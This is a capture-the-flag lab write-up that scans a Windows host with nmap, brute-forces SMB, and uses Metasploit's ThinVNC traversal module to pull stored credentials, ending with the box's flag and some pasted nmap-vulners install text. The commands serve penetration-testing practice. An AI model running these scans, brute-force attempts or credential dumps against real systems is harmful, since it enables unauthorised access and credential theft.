As always i start with a nmap scan

└──╼ #nmap -Pn -p1-65535 -oN 69.nmap
Starting Nmap 7.80 ( ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for
Host is up (0.032s latency).
Not shown: 65521 closed ports
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
└──╼ #

$xfreerdp /u:puck /p:Geheim2020 /v:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts
rhosts =>
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] – An SMB Login Error occurred while connecting to the IPC$ tree.
[*] – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Password Brute-forcing using Nmap

ubuntu@ubuntu:~$ nmap –script smb-brute -p445 –script-args userdb=users.txt,passdb=passwords.txt

Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.

cd /usr/share/nmap/scripts/
Then, clone the nmap-vulners GitHub repository by typing the below command into a terminal. That’s it for installing nmap-vulners. There’s absolutely no configuration required after installing it.

git clone

Cloning into ‘nmap-vulners’…
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts
rhosts =>
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >

flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box but we ask you in return to give us credit for the machines by adding backlink to  and  in your write-up.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *